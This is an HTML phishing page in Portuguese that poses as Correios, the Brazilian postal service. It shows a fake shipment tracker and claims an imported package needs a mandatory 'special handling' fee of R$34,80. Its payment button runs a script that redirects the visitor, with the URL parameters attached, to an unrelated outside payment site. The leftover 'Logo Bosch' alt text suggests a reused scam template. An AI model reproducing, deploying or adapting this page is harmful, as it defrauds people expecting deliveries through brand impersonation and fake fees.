<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <link rel="icon" href="images/R2GO5dEC6Z6q.png" type="./image/x-icon">
    <link rel="apple-touch-icon" sizes="180x180" href="images/R2GO5dEC6Z6q.png">

    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="">
    <link href="css2.html" rel="stylesheet">

    <link rel="stylesheet" href="css/6g11AeNG9qfU.css">
    <link rel="stylesheet" href="css/rRO3YhqBbqhs.css">

    <style>
        #header {
            background-color: #FFE600;
            display: flex;
            align-items: center;
            justify-content: center;
            padding: 0px 20px;
            height: 90px;
            margin-top: -6%;
            margin-bottom: -5%;
        }

        #header img {
            margin-top: 2%;
            width: 43%;
        }

        #content {
            text-align: center;
            margin-top: 20px;
        }
    </style>

    <title>Correios | MANUSEIO ESPECIAL</title>
</head>

<body>
    
    <div id="content">
        <div id="header">
            <img src="https://seeklogo.com/images/C/correios-2020-logo-D733E75ED9-seeklogo.com.png" style="width: 90px !important; " alt="Logo Bosch">
        </div>

        <div class="progress-container">
            <div>
                <div class="progress-item">
                    <div class="progress-bar" id="bar1"></div>
            
                    <div class="check-container" id="check1">
                        <img src="images/eTMQwjj5zM4Z.png" alt="Animação" id="img1">
                    </div>
                </div>

                <p id="text1">Pedido realizado</p>
            </div>

            <div>
                <div class="progress-item">
                    <div class="progress-bar" id="bar2"></div>
            
                    <div class="check-container" id="check2">
                        <img src="images/eTMQwjj5zM4Z.png" alt="Animação" id="img2">
                    </div>
                </div>
                
                <p id="text2">Em separação</p>
            </div>

            <div>
                <div class="progress-item">
                    <div class="progress-bar" id="bar3"></div>
            
                    <div class="check-container" id="check3">
                        <img src="images/eTMQwjj5zM4Z.png" alt="Animação" id="img3">
                    </div>
                </div>
                
                <p id="text3">Envio</p>
            </div>

            <div>
                <div class="progress-item">
                    <div class="progress-bar" id="bar4"></div>
            
                    <div class="check-container" id="check4">
                        <img src="images/eTMQwjj5zM4Z.png" alt="Animação" id="img4">
                    </div>
                </div>
                
                <p id="text4">Entrega</p>
            </div>
        </div>

        <section id="more-information">
            <h1>É necessário manuseio especial.</h1>

            <p>Ao preparar seu produto para entrega, identificamos que, por ser importado, é necessário<br>um <span class="bold">manuseio especial</span>.</p>

            <p>Este serviço possui uma taxa adicional (obrigatória).</p>

            <p>O valor da taxa é de apenas <span class="bold1">R$34,80</span>.</p>

            <a href="#" onclick="redirectCheckout(event)" style="background-color: #FFE600; color: black;">ENVIAR PRODUTO</a>
            <script>
                function redirectCheckout(event) {
                    event.preventDefault();
                    var currentUrlParams = window.location.search;
                    window.location.href = "https://pay.retireagora.online/PyE2ZyL2Ex03qRb" + currentUrlParams;
                }
            </script>
            <p>Após o pagamento da taxa, o produto será entregue a você rapidamente.</p>
        </section>
    </div>

    <script src="js/tjeWJGzObEM8.js"></script>
</body>
</html>
